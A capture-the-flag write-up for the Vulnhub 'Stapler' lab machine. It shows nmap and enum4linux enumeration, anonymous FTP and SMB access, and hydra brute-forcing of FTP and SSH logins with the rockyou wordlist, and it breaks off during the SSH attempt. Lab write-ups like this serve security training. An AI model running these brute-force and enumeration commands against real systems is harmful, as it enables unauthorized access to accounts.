Vulnhub - Stapler Writeup
Description:
Vulnhub - Stapler. Average beginner/intermediate VM, only a few twists. May find it easy/hard (depends on YOUR background) also which way you attack the box. It SHOULD work on both VMware and Virtualbox REBOOT the VM if you CHANGE network modes Fusion users, you’ll need to retry when importing
There are multiple methods to-do this machine
- At least two (2) paths to get a limited shell
- At least three (3) ways to get a root access
Enumeration
Start off enumeration after adding stapler.com to hosts file.
Nmap
# Nmap 7.80 scan initiated Sat Feb 29 00:37:43 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Desktop/tools/autorecon/results/stapler.com/scans/_full_tcp_nmap.txt -oX /home/kali/Desktop/tools/autorecon/results/stapler.com/scans/xml/_full_tcp_nmap.xml stapler.com
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -456769 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -456769 microseconds. Ignoring time.
Nmap scan report for stapler.com (192.168.15.3)
Host is up, received arp-response (0.00059s latency).
Scanned at 2020-02-29 00:37:45 EST for 167s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 64
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.15.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http syn-ack ttl 64 PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp closed ntp reset ttl 64
137/tcp closed netbios-ns reset ttl 64
138/tcp closed netbios-dgm reset ttl 64
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom? syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 1514
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, ODBCClient, SupportsTransactions, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, LongPassword, SupportsCompression, InteractiveClient, ConnectWithDatabase, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: ~h8\x0E\x0B\x01x\x0B\x1EK\x0BL~!E\x14\x0Ffo?
|_ Auth Plugin Name: mysql_native_password
12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
MAC Address: 08:00:27:6B:13:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.055 days (since Fri Feb 28 23:21:51 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms stapler.com (192.168.15.3)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 29 00:40:32 2020 -- 1 IP address (1 host up) scanned in 170.95 seconds
That’s a lot of services. We might have quite a few rabbit holes.
FTP
kali@kali:~/Desktop/vulnhub/stapler$ ftp stapler.com
Connected to stapler.com.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (stapler.com:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (264.5372 kB/s)
ftp> exit
221 Goodbye.
kali@kali:~/Desktop/vulnhub/stapler$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
FTP allows anonymous login and we are greeted with banner and a note can be found.
The names in banner and note might be users on the system. Let’s create a user list and add harry, elly and john.
Enum4linux
kali@kali:~/Desktop/tools/autorecon/results/stapler.com/scans$ enum4linux stapler.com
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar 2 20:27:18 2020
==========================
| Target Information |
==========================
Target ........... stapler.com
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on stapler.com |
===================================================
[+] Got domain/workgroup name: WORKGROUP
===========================================
| Nbtstat Information for stapler.com |
===========================================
Looking up status of 192.168.15.3
RED <00> - H <ACTIVE> Workstation Service
RED <03> - H <ACTIVE> Messenger Service
RED <20> - H <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - H <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on stapler.com |
====================================
[+] Server stapler.com allows sessions using username '', password ''
==========================================
| Getting domain SID for stapler.com |
==========================================
Unable to initialize messaging context
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=====================================
| OS information on stapler.com |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for stapler.com from smbclient:
[+] Got OS info for stapler.com from srvinfo:
Unable to initialize messaging context
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
============================
| Users on stapler.com |
============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
========================================
| Share Enumeration on stapler.com |
========================================
Unable to initialize messaging context
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on stapler.com
//stapler.com/print$ Mapping: DENIED, Listing: N/A
//stapler.com/kathy Mapping: OK, Listing: OK
//stapler.com/tmp Mapping: OK, Listing: OK
//stapler.com/IPC$ [E] Can't understand response:
Unable to initialize messaging context
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================
| Password Policy Information for stapler.com |
===================================================
[+] Attaching to stapler.com using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] RED
[+] Builtin
[+] Password Info for Domain: RED
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=============================
| Groups on stapler.com |
=============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================
| Users on stapler.com via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
----output snipped----
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
----output snipped----
[+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password ''
---output snipped-----
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
============================================
| Getting printer info for stapler.com |
============================================
Unable to initialize messaging context
No printers returned.
enum4linux complete on Mon Mar 2 20:28:07 2020
More users and some accessible smb shares. Add the users to our user list.
Smbclient
kali@kali:~/Desktop/vulnhub/stapler$ smbclient \\\\stapler.com\\tmp
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Feb 29 06:09:13 2020
.. D 0 Mon Jun 6 17:39:56 2016
ls N 274 Sun Jun 5 11:32:58 2016
19478204 blocks of size 1024. 16388900 blocks available
smb: \> exit
kali@kali:~/Desktop/vulnhub/stapler$ smbclient \\\\stapler.com\\kathy
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16388900 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16388900 blocks available
smb: \backup\> cd ..
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16388900 blocks available
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16388900 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (8.9 KiloBytes/sec) (average 8.9 KiloBytes/sec)
smb: \kathy_stuff\> exit
kali@kali:~/Desktop/vulnhub/stapler$ cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
There seems to be a wordpress backup and an ftp config backup. There is nothing interesting in there. No usernames or passwords.
Low Shell - Method 1 (Bruteforcing)
Bruteforce
I tried out all other ports, but most of them seems to be rabbit holes. I usually use brute forcing as the last resort.
Let’s try brute forcing ftp and ssh using hydra. We will be using the userlist we created.
Add -e nsr option to try out null, same and reverse of user name.
FTP
kali@kali:~/Desktop/vulnhub/stapler$ hydra -l elly -P /usr/share/wordlists/rockyou.txt ftp://stapler.com -V -e nsr
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-07 07:12:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ftp://stapler.com:21/
[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 1 of 14344402 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 2 of 14344402 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 3 of 14344402 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "123456" - 4 of 14344402 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "12345" - 5 of 14344402 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "123456789" - 6 of 14344402 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "password" - 7 of 14344402 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "iloveyou" - 8 of 14344402 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "princess" - 9 of 14344402 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "1234567" - 10 of 14344402 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "rockyou" - 11 of 14344402 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "12345678" - 12 of 14344402 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "abc123" - 13 of 14344402 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "nicole" - 14 of 14344402 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "daniel" - 15 of 14344402 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "babygirl" - 16 of 14344402 [child 15] (0/0)
[21][ftp] host: stapler.com login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-07 07:12:17
And bam!, we have a username and password to login. Didn’t even need to use a wordlist. Let’s login and see whats inside.
kali@kali:~/Desktop/vulnhub/stapler$ ftp stapler.com
Connected to stapler.com.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (stapler.com:kali): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11
drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 2016 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db
drwxr-xr-x 2 0 0 4096 Jun 07 2016 alternatives
drwxr-xr-x 8 0 0 4096 Jun 03 2016 apache2
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apparmor
drwxr-xr-x 9 0 0 4096 Jun 06 2016 apparmor.d
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apport
drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt
-rw-r----- 1 0 1 144 Jan 14 2016 at.deny
drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind
-rw-r--r-- 1 0 0 2188 Aug 31 2015 bash.bashrc
drwxr-xr-x 2 0 0 4096 Jun 03 2016 bash_completion.d
-rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist
drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates
-rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.daily
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly
-rw-r--r-- 1 0 0 722 Apr 05 2016 crontab
-rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab
drwxr-xr-x 2 0 0 4096 Jun 03 2016 dbconfig-common
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dbus-1
-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
drwxr-xr-x 3 0 0 4096 Jun 05 2016 default
-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 depmod.d
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dhcp
-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 dnsmasq.d
drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg
-rw-r--r-- 1 0 0 96 Apr 20 2016 environment
drwxr-xr-x 4 0 0 4096 Jun 03 2016 fonts
-rw-r--r-- 1 0 0 594 Jun 03 2016 fstab
-rw-r--r-- 1 0 0 132 Feb 10 2016 ftpusers
-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf
-rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf
-rw-rw-r-- 1 0 0 1253 Jun 04 2016 group
-rw------- 1 0 0 1240 Jun 03 2016 group-
drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d
-rw-r----- 1 0 42 1004 Jun 04 2016 gshadow
-rw------- 1 0 0 995 Jun 03 2016 gshadow-
drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss
-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf
-rw-r--r-- 1 0 0 12 Jun 03 2016 hostname
-rw-r--r-- 1 0 0 469 Jun 05 2016 hosts
-rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow
-rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny
-rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf
drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 initramfs-tools
-rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv
-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 insserv.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi
-rw-r--r-- 1 0 0 345 Mar 13 09:35 issue
-rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net
drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd
drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel
-rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf
-rw-r--r-- 1 0 0 26754 Jun 07 2016 ld.so.cache
-rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf
drwxr-xr-x 2 0 0 4096 Jun 07 2016 ld.so.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 ldap
-rw-r--r-- 1 0 0 267 Oct 22 2015 legal
-rw-r--r-- 1 0 0 191 Jan 18 2016 libaudit.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 libnl-3
drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd
-rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias
-rw-r--r-- 1 0 0 9149 Jun 03 2016 locale.gen
-rw-r--r-- 1 0 0 3687 Jun 03 2016 localtime
drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck
-rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs
-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 logrotate.d
-rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release
drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm
-r--r--r-- 1 0 0 33 Jun 03 2016 machine-id
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime
-rw-r--r-- 1 0 0 2579 Jun 03 2016 mailcap
-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order
drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm
-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types
-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modprobe.d
-rw-r--r-- 1 0 0 195 Apr 20 2016 modules
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modules-load.d
lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts
drwxr-xr-x 4 0 0 4096 Jun 06 2016 mysql
drwxr-xr-x 7 0 0 4096 Jun 03 2016 network
-rw-r--r-- 1 0 0 91 Oct 22 2015 networks
drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt
-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf
drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt
lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release
-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf
-rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 pam.d
-rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd
-rw------- 1 0 0 2869 Jun 03 2016 passwd-
drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl
drwxr-xr-x 3 0 0 4096 Jun 03 2016 php
drwxr-xr-x 3 0 0 4096 Jun 06 2016 phpmyadmin
drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm
drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1
drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp
-rw-r--r-- 1 0 0 575 Oct 22 2015 profile
drwxr-xr-x 2 0 0 4096 Jun 03 2016 profile.d
-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python2.7
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3.5
-rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc0.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc2.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc3.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc4.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc5.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc6.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rcS.d
-rw-r--r-- 1 0 0 62 Jun 07 2016 resolv.conf
drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf
-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt
-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc
-rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d
drwxr-xr-x 3 0 0 4096 Mar 13 11:04 samba
-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc
-rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty
drwxr-xr-x 4 0 0 4096 Jun 03 2016 security
drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux
-rw-r--r-- 1 0 0 19605 Oct 25 2014 services
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml
-rw-r----- 1 0 42 4518 Jun 05 2016 shadow
-rw------- 1 0 0 1873 Jun 03 2016 shadow-
-rw-r--r-- 1 0 0 125 Jun 03 2016 shells
drwxr-xr-x 2 0 0 4096 Jun 03 2016 skel
-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf
drwxr-xr-x 2 0 0 4096 Jun 04 2016 ssh
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ssl
-rw-r--r-- 1 0 0 644 Jun 04 2016 subgid
-rw------- 1 0 0 625 Jun 03 2016 subgid-
-rw-r--r-- 1 0 0 644 Jun 04 2016 subuid
-rw------- 1 0 0 625 Jun 03 2016 subuid-
-r--r----- 1 0 0 769 Jun 05 2016 sudoers
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d
-rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sysctl.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 systemd
drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo
-rw-r--r-- 1 0 0 14 Jun 03 2016 timezone
drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d
-rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf
drwxr-xr-x 4 0 0 4096 Jun 03 2016 udev
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier
drwxr-xr-x 2 0 0 4096 Jun 03 2016 vim
drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools
-rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list
-rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list
lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml
drwxr-xr-x 2 0 0 4096 Jun 03 2016 zsh
226 Directory send OK.
ftp>
Looks like it pointing to \etc folder. I ploughed through almost all the files, but I couldn’t find anything noteworthy. Probably another rabbit hole.
SSH
kali@kali:~/Desktop/vulnhub/stapler$ hydra -L user.txt -e nsr stapler.com ssh -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-07 08:36:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:38/p:3), ~8 tries per task
[DATA] attacking ssh://stapler.com:22/
[ATTEMPT] target stapler.com - login "Elly" - pass "Elly" - 1 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "Elly" - pass "" - 2 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "Elly" - pass "yllE" - 3 of 114 [child 2] (0/0)
